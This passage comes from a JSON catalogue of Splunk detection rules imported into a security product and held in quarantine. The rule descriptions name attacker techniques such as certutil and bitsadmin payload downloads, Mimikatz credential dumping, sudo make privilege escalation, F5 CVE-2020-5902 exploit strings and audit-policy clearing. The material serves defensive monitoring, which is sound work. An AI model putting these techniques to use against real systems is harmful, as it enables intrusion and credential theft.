outbound traffic from email servers, using statistical analysis to detect anomalies based on average and standard deviation metrics. This activity is significant as it may indicate a malicious actor exfiltrating data via your email server. 
If confirmed malicious, this could lead to unauthorized data access and potential data breaches, compromising sensitive information and impacting organizational security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/email-servers-sending-high-volume-traffic-to-hosts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7f5fb3e1-4209-4914-90db-0ec21b556378", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/email_servers_sending_high_volume_traffic_to_hosts.yml" } }, { "id": "splunk-security-content-7f5fb3e1-4209-4914-90db-0ec21b936378", "type": "detection", "name": "SMB Traffic Spike", "description": "The following analytic detects spikes in Server Message Block (SMB) traffic connections, which are used for sharing files and resources between computers. It leverages network traffic logs to monitor connections on ports 139 and 445, and SMB application usage. By calculating the average and standard deviation of SMB connections over the past 70 minutes, it identifies sources exceeding two standard deviations from the average. This activity is significant as it may indicate potential SMB-based attacks, such as ransomware or data theft. 
If confirmed malicious, attackers could exfiltrate data or spread malware within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/smb-traffic-spike.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7f5fb3e1-4209-4914-90db-0ec21b936378", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/smb_traffic_spike.yml" } }, { "id": "splunk-security-content-7f6b8a95-3fb7-429a-8c53-e5d4f8d92a10", "type": "detection", "name": "Windows MSC EvilTwin Directory Path Manipulation", "description": "The following analytic detects potential MSC EvilTwin loader exploitation, which manipulates directory paths with spaces to bypass security controls. The technique, described as CVE-2025-26633, involves crafting malicious MSC files that leverage MUIPath parameter manipulation. This detection focuses on suspicious MSC file execution patterns with unconventional command-line parameters, particularly those containing unusual spaces in Windows System32 paths or suspicious additional parameters after the MSC file. 
If confirmed malicious, this behavior could allow an attacker to execute arbitrary code with elevated privileges through DLL side-loading or path traversal techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1036.005", "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-msc-eviltwin-directory-path-manipulation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7f6b8a95-3fb7-429a-8c53-e5d4f8d92a10", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_msc_eviltwin_directory_path_manipulation.yml" } }, { "id": "splunk-security-content-7f8e2b4c-9a3d-4e1f-8c5b-6d7e8f9a0b1c", "type": "detection", "name": "Cisco Privileged Account Creation with Suspicious SSH Activity", "description": "This analytic detects a correlation between privileged account creation on Cisco IOS devices and subsequent inbound SSH connections to non-standard ports or sshd_operns by correlating risk events.\nThis correlation identifies when both \"Cisco IOS Suspicious Privileged Account Creation\" and SSH-related Snort detections (\"SSH Connection to sshd_operns\" or \"SSH Connection to Non-Standard Port\") fire for the same network device.\nThis behavior is highly indicative of persistence establishment following initial compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.004", "T1136", "T1078" ], "log_source": null, "playbook": null, 
"verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-privileged-account-creation-with-suspicious-ssh-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7f8e2b4c-9a3d-4e1f-8c5b-6d7e8f9a0b1c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_privileged_account_creation_with_suspicious_ssh_activity.yml" } }, { "id": "splunk-security-content-7fac8d40-e370-45ea-a4a3-031bbcc18b02", "type": "detection", "name": "Windows File Download Via CertUtil", "description": "The following analytic detects the use of `certutil.exe` to download files using the `-URL`, `-urlcache` or '-verifyctl' arguments. This behavior is identified by monitoring command-line executions for these specific arguments via Endpoint Detection and Response (EDR) telemetry. This activity is significant because `certutil.exe` is a legitimate tool often abused by attackers to download and execute malicious payloads. 
If confirmed malicious, this could allow an attacker to download and execute arbitrary files, potentially leading to code execution, data exfiltration, or further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-file-download-via-certutil.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7fac8d40-e370-45ea-a4a3-031bbcc18b02", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_file_download_via_certutil.yml" } }, { "id": "splunk-security-content-7fb15084-b14e-405a-bd61-a6de15a40722", "type": "detection", "name": "Cloud Instance Modified By Previously Unseen User", "description": "The following analytic identifies cloud instances being modified by users who have not previously modified them. It leverages data from the Change data model, focusing on successful modifications of EC2 instances. This activity is significant because it can indicate unauthorized or suspicious changes by potentially compromised or malicious users. 
If confirmed malicious, this could lead to unauthorized access, configuration changes, or potential disruption of cloud services, posing a significant risk to the organization's cloud infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-instance-modified-by-previously-unseen-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7fb15084-b14e-405a-bd61-a6de15a40722", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_instance_modified_by_previously_unseen_user.yml" } }, { "id": "splunk-security-content-7feb7972-7ac3-11eb-bac8-acde48001122", "type": "detection", "name": "Suspicious Scheduled Task from Public Directory", "description": "The following analytic identifies the creation of scheduled tasks that execute binaries or scripts from public directories, such as users\\public, \\programdata\\, or \\windows\\temp, using schtasks.exe with the /create command. It leverages Sysmon Event ID 1 data to detect this behavior. This activity is significant because it often indicates an attempt to maintain persistence or execute malicious scripts, which are common tactics in malware deployment. 
If confirmed as malicious, this could lead to data compromise, unauthorized access, and potential lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-scheduled-task-from-public-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7feb7972-7ac3-11eb-bac8-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_scheduled_task_from_public_directory.yml" } }, { "id": "splunk-security-content-802a0930-0a4a-4451-bf6c-6366c6b6d9e7", "type": "detection", "name": "Windows Global Object Access Audit List Cleared Via Auditpol", "description": "The following analytic identifies the execution of `auditpol.exe` with the \"/resourceSACL\" flag, and either the \"/clear\" or \"/remove\" command-line arguments used to remove or clear the global object access audit policy. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity can be significant as it indicates potential defense evasion by adversaries or Red Teams, aiming to limit data that can be leveraged for detections and audits. 
If confirmed malicious, this behavior could allow attackers to bypass defenses, and plan further attacks, potentially leading to full machine compromise or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-global-object-access-audit-list-cleared-via-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "802a0930-0a4a-4451-bf6c-6366c6b6d9e7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_global_object_access_audit_list_cleared_via_auditpol.yml" } }, { "id": "splunk-security-content-80402396-d78a-4c6e-ade5-7697ea670adf", "type": "detection", "name": "Windows SnappyBee Create Test Registry", "description": "The following analytic detects modifications to the Windows registry under `SOFTWARE\\Microsoft\\Test`, a location rarely used by legitimate applications in a production environment. Monitoring this key is crucial, as adversaries may create or alter values here to track updates to their own file path, an updated configuration file, or a marker that the system has been compromised. The detection leverages **Sysmon Event ID 13** (Registry Value Set) to identify unauthorized changes. 
Analysts should investigate processes associated with these modifications, particularly unsigned executables or suspicious command-line activity, as they may indicate malware or unauthorized software behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-snappybee-create-test-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "80402396-d78a-4c6e-ade5-7697ea670adf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_snappybee_create_test_registry.yml" } }, { "id": "splunk-security-content-80630ff4-8e4c-11eb-aab5-acde48001122", "type": "detection", "name": "BITSAdmin Download File", "description": "The following analytic detects the use of `bitsadmin.exe` with the `transfer` parameter to download a remote object. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line telemetry. This activity is significant because `bitsadmin.exe` can be exploited to download and execute malicious files without immediate detection. If confirmed malicious, an attacker could use this technique to download and execute payloads, potentially leading to code execution, privilege escalation, or persistent access within the environment. 
Review parallel and child processes, especially `svchost.exe`, for associated artifacts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1197", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/bitsadmin-download-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "80630ff4-8e4c-11eb-aab5-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/bitsadmin_download_file.yml" } }, { "id": "splunk-security-content-8085b79b-9b85-4e67-ad63-351c9e9a5e9a", "type": "detection", "name": "Okta Mismatch Between Source and Response for Verify Push Request", "description": "The following analytic identifies discrepancies between the source and response events for Okta Verify Push requests, indicating potential suspicious behavior. It leverages Okta System Log events, specifically `system.push.send_factor_verify_push` and `user.authentication.auth_via_mfa` with the factor \"OKTA_VERIFY_PUSH.\" The detection groups events by SessionID, calculates the ratio of successful sign-ins to push requests, and checks for session roaming and new device/IP usage. This activity is significant as it may indicate push spam or unauthorized access attempts. 
If confirmed malicious, attackers could bypass MFA, leading to unauthorized access to sensitive systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-mismatch-between-source-and-response-for-verify-push-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8085b79b-9b85-4e67-ad63-351c9e9a5e9a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_mismatch_between_source_and_response_for_verify_push_request.yml" } }, { "id": "splunk-security-content-80879283-c30f-44f7-8471-d1381f6d437a", "type": "detection", "name": "GetCurrent User with PowerShell Script Block", "description": "The following analytic detects the execution of the `GetCurrent` method from the WindowsIdentity .NET class using PowerShell Script Block Logging (EventCode=4104). This method identifies the current Windows user. The detection leverages PowerShell script block logs to identify when this method is called. This activity is significant because adversaries and Red Teams may use it to gain situational awareness and perform Active Directory discovery on compromised endpoints. 
If confirmed malicious, this could allow attackers to map out user accounts and potentially escalate privileges or move laterally within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getcurrent-user-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "80879283-c30f-44f7-8471-d1381f6d437a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getcurrent_user_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-809b31d2-5462-11eb-ae93-0242ac130002", "type": "detection", "name": "BCDEdit Failure Recovery Modification", "description": "The following analytic detects modifications to the Windows error recovery boot configurations using bcdedit.exe with flags such as \"recoveryenabled\" and \"no\". It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line executions. This activity is significant because ransomware often disables recovery options to prevent system restoration, making it crucial for SOC analysts to investigate. 
If confirmed malicious, this could hinder recovery efforts, allowing ransomware to cause extensive damage and complicate remediation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/bcdedit-failure-recovery-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "809b31d2-5462-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/bcdedit_failure_recovery_modification.yml" } }, { "id": "splunk-security-content-80b22836-5091-4944-80ee-f733ac443f4f", "type": "detection", "name": "Linux Make Privilege Escalation", "description": "The following analytic detects the use of the 'make' command with elevated privileges to execute system commands as root, potentially leading to a root shell. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that include 'make', '--eval', and 'sudo'. This activity is significant because it indicates a possible privilege escalation attempt, allowing a user to gain root access. 
If confirmed malicious, an attacker could achieve full control over the system, execute arbitrary commands, and compromise the entire environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-make-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "80b22836-5091-4944-80ee-f733ac443f4f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_make_privilege_escalation.yml" } }, { "id": "splunk-security-content-80b44ae2-60ff-43f1-8e56-34beb49a340a", "type": "detection", "name": "O365 Exfiltration via File Access", "description": "The following analytic detects when an excessive number of files are accessed from O365 by the same user over a short period of time. A malicious actor may abuse the \"open in app\" functionality of SharePoint through scripted or Graph API based access to evade triggering the FileDownloaded Event. This behavior may indicate an attacker staging data for exfiltration or an insider threat removing organizational data. 
Additional attention should be taken with any Azure Guest (#EXT#) accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-exfiltration-via-file-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "80b44ae2-60ff-43f1-8e56-34beb49a340a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_exfiltration_via_file_access.yml" } }, { "id": "splunk-security-content-80f3fc1b-705f-4080-bf08-f61bf013b900", "type": "detection", "name": "O365 Privileged Role Assigned To Service Principal", "description": "The following analytic detects potential privilege escalation threats in Azure Active Directory (AD). This detection is important because it identifies instances where privileged roles that hold elevated permissions are assigned to service principals. This helps prevent unauthorized access or malicious activities, which occur when these non-human entities access Azure resources to exploit them. False positives might occur since administrators can legitimately assign privileged roles to service principals. 
This detection leverages the O365 Universal Audit Log data source.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-privileged-role-assigned-to-service-principal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "80f3fc1b-705f-4080-bf08-f61bf013b900", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_privileged_role_assigned_to_service_principal.yml" } }, { "id": "splunk-security-content-80f9d53e-9ca1-11eb-b0d6-acde48001122", "type": "detection", "name": "Windows Multiple Users Remotely Failed To Authenticate From Host", "description": "The following analytic identifies a source host failing to authenticate against a remote host with 30 unique users. It leverages Windows Event 4625 with Logon Type 3, indicating remote authentication attempts. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges in an Active Directory environment. If confirmed malicious, this activity could lead to unauthorized access, privilege escalation, and potential compromise of sensitive information. 
This detection is crucial for real-time security monitoring and threat hunting.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-users-remotely-failed-to-authenticate-from-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "80f9d53e-9ca1-11eb-b0d6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_users_remotely_failed_to_authenticate_from_host.yml" } }, { "id": "splunk-security-content-80fcc4d4-fd90-488e-b55a-4e7190ae6ce2", "type": "detection", "name": "Windows Unusual NTLM Authentication Users By Source", "description": "The following analytic detects when an unusual number of NTLM authentications is attempted by the same source. This activity generally results when an attacker attempts to brute force, password spray, or otherwise authenticate to a domain joined Windows device using an NTLM based process/attack. 
This same activity may also generate a large number of EventID 4776 events as well.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-ntlm-authentication-users-by-source.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "80fcc4d4-fd90-488e-b55a-4e7190ae6ce2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_ntlm_authentication_users_by_source.yml" } }, { "id": "splunk-security-content-80ffaede-1f12-49d5-a86e-b4b599b68b3c", "type": "detection", "name": "Windows Root Domain linked policies Discovery", "description": "The following analytic detects the use of the `[Adsisearcher]` type accelerator in PowerShell to query Active Directory for root domain linked policies. It leverages PowerShell Script Block Logging (EventCode=4104) to identify this activity. This behavior is significant as it may indicate an attempt by adversaries or Red Teams to gain situational awareness and perform Active Directory Discovery. 
If confirmed malicious, this activity could allow attackers to map out domain policies, potentially aiding in further exploitation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-root-domain-linked-policies-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "80ffaede-1f12-49d5-a86e-b4b599b68b3c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_root_domain_linked_policies_discovery.yml" } }, { "id": "splunk-security-content-810e4dbc-d46e-11ea-87d0-0242ac130003", "type": "detection", "name": "Detect F5 TMUI RCE CVE-2020-5902", "description": "The following analytic identifies remote code execution (RCE) attempts targeting F5 BIG-IP, BIG-IQ, and Traffix SDC devices, specifically exploiting CVE-2020-5902. It uses regex to detect patterns in syslog data that match known exploit strings such as \"hsqldb;\" and directory traversal sequences. This activity is significant because successful exploitation can allow attackers to execute arbitrary commands on the affected devices, leading to full system compromise. 
If confirmed malicious, this could result in unauthorized access, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-f5-tmui-rce-cve-2020-5902.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "810e4dbc-d46e-11ea-87d0-0242ac130003", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/detect_f5_tmui_rce_cve_2020_5902.yml" } }, { "id": "splunk-security-content-81263de4-160a-11ec-944f-acde48001122", "type": "detection", "name": "Non Chrome Process Accessing Chrome Default Dir", "description": "The following analytic detects a non-Chrome process accessing files in the Chrome user default folder. It leverages Windows Security Event logs, specifically event code 4663, to identify unauthorized access attempts. This activity is significant because the Chrome default folder contains sensitive user data such as login credentials, browsing history, and cookies. If confirmed malicious, this behavior could indicate an attempt to exfiltrate sensitive information, often associated with RATs, trojans, and advanced persistent threats like FIN7. 
Such access could lead to data theft and further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/non-chrome-process-accessing-chrome-default-dir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "81263de4-160a-11ec-944f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/non_chrome_process_accessing_chrome_default_dir.yml" } }, { "id": "splunk-security-content-8148c29c-c952-11eb-9255-acde48001122", "type": "detection", "name": "Detect Mimikatz With PowerShell Script Block Logging", "description": "The following analytic detects the execution of Mimikatz commands via PowerShell by leveraging PowerShell Script Block Logging (EventCode=4104). This method captures and logs the full command sent to PowerShell, allowing for the identification of suspicious activities such as Pass the Ticket, Pass the Hash, and credential dumping. This activity is significant as Mimikatz is a well-known tool used for credential theft and lateral movement. 
If confirmed malicious, this could lead to unauthorized access, privilege escalation, and potential compromise of sensitive information within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-mimikatz-with-powershell-script-block-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8148c29c-c952-11eb-9255-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_mimikatz_with_powershell_script_block_logging.yml" } }, { "id": "splunk-security-content-8158ccc4-6038-11eb-ae93-0242ac130002", "type": "detection", "name": "O365 Excessive SSO logon errors", "description": "The following analytic detects accounts experiencing a high number of Single Sign-On (SSO) logon errors. It leverages data from the `o365_management_activity` dataset, focusing on failed user login attempts with SSO errors. This activity is significant as it may indicate brute-force attempts or the hijacking/reuse of SSO tokens. 
If confirmed malicious, attackers could potentially gain unauthorized access to user accounts, leading to data breaches, privilege escalation, or further lateral movement within the organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-excessive-sso-logon-errors.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8158ccc4-6038-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_excessive_sso_logon_errors.yml" } }, { "id": "splunk-security-content-817a5c89-5b92-4818-a22d-aa35e1361afe", "type": "detection", "name": "Linux Auditd Sudo Or Su Execution", "description": "The following analytic detects the execution of the \"sudo\" or \"su\" command on a Linux operating system. It leverages data from Linux Auditd, focusing on process names and parent process names. This activity is significant because \"sudo\" and \"su\" commands are commonly used by adversaries to elevate privileges, potentially leading to unauthorized access or control over the system. 
If confirmed malicious, this activity could allow attackers to execute commands with root privileges, leading to severe security breaches, data exfiltration, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-sudo-or-su-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "817a5c89-5b92-4818-a22d-aa35e1361afe", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_sudo_or_su_execution.yml" } }, { "id": "splunk-security-content-81a9f2fe-1697-473c-af1d-086b0d8b63c8", "type": "detection", "name": "ASL AWS Create Access Key", "description": "The following analytic identifies the creation of AWS IAM access keys by a user for another user, which can indicate privilege escalation. It leverages AWS CloudTrail logs to detect instances where the user creating the 